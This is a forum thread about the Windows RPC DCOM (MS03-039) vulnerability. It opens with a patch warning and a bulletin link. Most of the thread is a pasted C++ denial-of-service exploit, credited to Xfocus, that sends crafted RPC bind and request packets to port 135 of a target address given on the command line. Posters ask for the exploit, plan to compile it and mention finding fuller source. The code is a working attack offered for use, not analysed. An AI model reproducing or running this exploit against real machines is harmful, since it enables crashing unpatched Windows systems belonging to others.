While perusing Slashdot I got forwarded to a message board where the full c++ code was posted to exploit the newest Windows RPC DCOM vulnerability. This means the virus has either already been written or will be very shortly.

I highly recommend you update your Win boxes while you still can.

Here is a link about the vulnerability and the patch.

http://www.microsoft.com/security/security_bulletins/ms03-039.asp

Originally posted by Sgt Beavis
This means the virus has either already been written or will be very shortly.
http://dfwstangs.net/forums/showthread.php?s=&threadid=122624

forget the link the patch where's the link to the exploit code ;)

/// Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability

#include (winsock2.h)
#include (stdio.h)
#include (windows.h)
#include (process.h)
#include (string.h)
#include (winbase.h)

unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00, 0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00, 0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C, 0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00, 0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00, 0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31, 0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
WSADATA WSAData;
int i;
SOCKET sock;
SOCKADDR_IN addr_in;

short port=135;
unsigned char buf1[0x1000];
printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n");
printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfo cus.org\n");
printf("Welcome to http://www.xfocus.net\n");
if(argc<2)
{
printf("useage:%s target\n",argv[0]);
exit(1);
}


if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}

addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(port);
addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==I NVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCK ET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}

i=recv(sock,buf1,1024,MSG_PEEK);
if (send(sock,request,sizeof(request),0)==SOCKET_ERRO R)
{
printf("Send failed.Error:%d\n",WSAGetLastError());
return;
}
i=recv(sock,buf1,1024,MSG_PEEK);
}

gotta try compiling that one at home tonite. That code doesn't look complete but it was enough to help me find the full .c file.

Thanks.